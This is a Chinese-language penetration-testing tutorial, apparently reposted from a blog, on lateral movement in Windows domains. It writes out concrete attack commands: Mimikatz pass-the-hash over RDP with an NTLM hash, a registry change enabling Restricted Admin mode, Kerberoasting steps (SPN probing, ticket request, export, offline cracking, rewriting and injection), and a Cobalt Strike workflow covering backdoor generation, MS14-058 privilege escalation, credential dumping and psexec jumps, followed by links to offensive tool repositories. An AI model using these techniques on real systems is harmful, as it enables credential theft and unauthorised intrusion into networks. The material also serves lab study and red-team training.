演示案例：
? 域橫向移動RDP傳遞-Mimikatz
? 域橫向移動SPN服務-探針,請求,導出,破解,重寫
? 域橫向移動測試流程一把梭哈-CobaltStrike初體驗

---

案例1-域橫向移動RDP傳遞-Mimikatz

除了上述講到的IPC，WMI，SMB等協議的鏈接外，獲取到的明文密碼或HASH密文也可以通過RDP協議進行鏈接操作。
RDP協議連接：判斷對方遠程桌面服務是否開啟（默認：3389），端口掃描判斷

RDP明文密碼鏈接
windows: mstsc
mstsc.exe /console /v:192.168.3.21 /admin
linux: rdesktop 192.168.3.21:3389

Q：

解決：failed to open X11 display__囧囧_的博客-CSDN博客

RDP密文HASH鏈接
windows Server需要開啟 Restricted Admin mode，在Windows 8.1和Windows Server 2012 R2中默認開啟，同時如果Win 7 和Windows Server 2008 R2安裝了2871997、2973351補丁也支持；

開啟命令：
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
開啟后運行：
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"

一般在我的電腦——右鍵屬性——遠程設置

如果連接報錯：出現身份驗證錯誤/要求的函數不受支持的解決方案

windows專業版：打開gpedit.msc——計算機配置>管理模板>系統>憑據分配>加密數據庫修正——選擇啟用并選擇易受攻擊
windows家庭版：打開gpedit.msc——找HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters（CredSSP\Parameters不存在則手動新建：左側目錄System點擊右鍵，選擇“新建 - 項”，輸入文件夾名）——在Parameters 里 新建 DWORD（32位），名稱：“AllowEncryptionOracle"，值：2——再次連接遠程桌面，若仍失敗則重啟電腦后再次嘗試

---

案例2-域橫向移動SPN服務-探針,請求,導出,破解,重寫

kerberos中的spn詳解 - 滲透測試中心 - 博客園

?SPN（Service Principal Name服務主體名稱）

黑客可以使用有效的域用戶的身份驗證票證（TGT）去請求運行在服務器上的一個或多個目標服務的服務票證。DC在活動目錄中查找SPN，并使用與SPN關聯的服務帳戶加密票證，以便服務能夠驗證用戶是否可以訪問。請求的Kerberos服務票證的加密類型是RC4_HMAC_MD5，這意味著服務帳戶的NTLM密碼哈希用于加密服務票證。黑客將收到的TGS票據離線進行破解，即可得到目標服務帳號的HASH，這個稱之為Kerberoast攻擊。如果我們有一個為域用戶帳戶注冊的任意SPN，那么該用戶帳戶的明文密碼的NTLM哈希值就將用于創建服務票證。這就是Kerberoasting攻擊的關鍵。

探針

setspn -q */* setspn -q */* | findstr "MSSQL"

setspn就是調用spn掃描，這是自帶掃描

請求獲取票據

# 刪除緩存票據 klist purge# powershell請求 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"# mimikatz請求 mimikatz.exe "kerberos::ask /target:xxxx"# 查看票據 klist

導出票據

# mimikatz mimikatz.exe "kerberos::list /export"

破解票據

# 破解工具tgsrepcrack.py python3環境運行 python tgsrepcrack.py passwd.txt xxxx.kirbi python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

重寫票據

python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500 python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512mimikatz.exe kerberos::ptt xxxx.kirbi # 將生成的票據注入內存

利用

dir //xxx.xxx.xxx.xxx/c$

---

案例3-域橫向移動測試流程一把梭哈-CobaltStrike初體驗

CobaltStrike也稱CS打槍工具

滲透測試神器Cobalt Strike使用教程

參考：CobaltStrike使用指南
https://docs.qq.com/blankpage/DZlVaY3dzWlpRZlh3

大概流程：
啟動-配置-監聽-執行-上線-提權-信息收集(網絡,憑證,定位等)-滲透
1.關于啟動及配置講解
2.關于提權及插件加載
3.關于信息收集命令講解
4.關于視圖自動化功能講解

演示：

啟動：

運行teamserver團隊服務器：
./teamserver 團隊服務器的ip地址 密碼（有這個密碼就連接到工具上去）

啟動完后打開本地客戶端

?

阿里云服務器要開啟這個端口（注意！） 否則連接會超時奧！

連接成功：這樣就進入到cs的工具畫面

這就是它的簡單啟動

?配置

?啟動完之后更重要的就是配置，它怎么上線。可以理解為它就是一款遠控工具，這個遠控工具里面又實現了一些功能，大部分攻擊主機，我先要控制它再在上面做后續操作。下一步就是讓對方上線，但是由于它是一個團隊服務器，你搞的主機和我搞的主機怎么區分開呢？加入我和你都連接到終端，可以多個人連接上來一起攻擊，但是怎么區分哪個是你的哪個是我的？要通過配置監聽器來實現，從你這個監聽器過來的就是你攻擊的。監聽器就是配置木馬傳輸的管道！

如何配置監聽器？

Beacon為內置的Listener，即在目標主機執行相應的payload，獲取shell到CS上；其中包含DNS、HTTP、SMB。

Foreign為外部結合的Listener，常用于MSF的結合，例如獲取meterpreter到MSF上。

下面生成后門文件：
點擊attack——windows executable（常用）

?

?

現在我們把這個web.exe后門復制到2008r2webserver，執行，執行后：

?（webadmin是當前用戶權限）

?現在要對它進行提權操作：

點擊Access——elevate（提權）

自帶只有兩種提權方式，我們要加載插件：

?插件在“涉及資源”之中，我們下面用第3條資源和第六條

?插件該如何加載？(加載插件就是因為插件上有一些其他功能）
點擊Cobalt strike——script manager（腳本管理器）——點擊load上傳插件

?

?load過后 選中——點擊Unload就是加載插件（再右鍵被控制的主機——Access——Elevate發現多了一些插件：）

這個插件就幫我搞了幾個payload，三個提權exp，選中其中一個，比如ms14-058——選擇監聽器

點擊launch后就會利用ms14-058對它進行攻擊，如果速度過慢，就右鍵webadmin——session——sleep（設置為1或0）

?

由于已經提升到system權限，就用終端來執行（右鍵interact）

?輸入help可以查看命令
輸入getuid，返回的就是system

現在已經得到這臺主機的系統權限了，接下來就要進行內網滲透，并且要判斷它的網絡環境
接下來就是我們的第三步：信息收集

執行net view（執行它當前的網絡環境）就會探測當前的網絡架構：

這些信息不可能我們每個都收集一下，點擊view——targets，所有探測的信息就會自動展示出來：(執行net view的時候就會加載出來）

還要判斷是不是域環境：
輸入net computers

還有一些命令比如 net dclist，獲取當前dc列表，它就會獲取域控地址

net 后tab可以查看一些命令

執行net user /domain 官方沒有：就調用shell去執行——》shell net user /domain（得到域內用戶）用shell就和在windows上一樣

收集口令憑證：system右鍵（webadmin權限不夠）——access——run mimikatz

收集到口令之后我也不可能一個個翻一個個看，怎么辦？
點擊view——選擇credentials：可以看到獲取的密碼，都幫你記錄好了

前期信息收集都差不多了（判斷工作組，判斷域，域內用戶的信息收集，收集口令憑證等）

對收集到的目標進行攻擊：比如我要攻擊192.168.3.32——右鍵jump（就是對它進行攻擊）——psexec

?

它就會調用jump的psexec來連接主機，嘗試攻擊。

其他操作自己慢慢摸索吧~

涉及資源:
https://github.com/nidem/kerberoast
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw?? 提取碼: xiao
https://github.com/pandasec888/taowu-cobalt-strike
https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q 提取碼:dtm2
https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug? 提取碼: taqu
https://github.com/DeEpinGhOst/Erebus
https://github.com/rsmudge/ElevateKit
https://github.com/harleyQu1nn/AggressorScripts
https://github.com/bluscreenofjeff/AggressorScripts

https://github.com/360-A-Team/CobaltStrike-Toolset
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/michalkoczwara/aggressor_scripts_collection

https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/ramenOx3f/AggressorScripts
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/threatexpress/persistence-aggressor-script
https://github.com/threatexpress/aggressor-scripts
https://github.com/branthale/CobaltStrikeCNA
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/Und3rf10wl/Aggressor-scripts
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/vysec/Aggressor-VYSEC
https://github.com/threatexpresslaggressor-scripts

總結

以上是生活随笔為你收集整理的【内网安全】域横向CobalStrikeSPNRDP的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。